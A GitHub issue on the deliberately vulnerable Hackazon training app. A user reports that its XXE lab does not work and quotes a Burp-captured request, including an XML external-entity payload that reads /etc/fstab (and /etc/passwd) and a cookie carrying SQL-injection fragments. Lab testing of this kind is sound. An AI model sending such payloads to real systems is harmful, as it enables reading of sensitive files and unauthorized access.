hackazon icon indicating copy to clipboard operation
hackazon copied to clipboard
verified publisher icon rapid7

Issues with XXE

Open artsalmon opened this issue 5 years ago • 0 comments

XXE vulnerabilities seem not to be function.

I have verified that in XXE is enabled in the vulnerabilities.md file, I have also logged in to the admin page and ensured that there are pages with the XXE vulnerability was enabled. I turned it on every location that I could, just in case. I verified the PHP files in the config location to ensure the the XXE was set to true for the location I was needing. I enabled XXE for the Cart/View area.

I setup BURP to intercept the HTTP GET requests, and I capture the code below

---ORGINAL CODE--- GET /success.txt HTTP/1.1 Host: 192.168.198.145 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.198.145/cart/view Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1 ---END OF CODE---

I modified the code to have the XML example code in the vulnerability

---MODIFIED CODE--- GET /success.txt HTTP/1.1 Host: 192.168.198.145 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Type: text/xml Referer: http://192.168.198.145/cart/view Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1

<'?xml version="1.0" encoding="utf-8"?> <'!DOCTYPE roottag [<'!ENTITY goodies SYSTEM "file:///etc/fstab">]> <'roottag>&goodies; ---END OF CODE---

NOTE: I added ' at the start of each line to allow the code to display correctly in the note. In the real example, the ' was removed.

I have also modified the goodies to see if the PASSWD file would display.

I only get a HTML 400 return error.

I have clearing the cache, I have tried doing this is a VM with no other content, I ensure that firefox was updated.

Has anyone tested and/or seen XXE vulnerabilities function with hackazon?

artsalmon avatar Apr 08 '20 23:04 artsalmon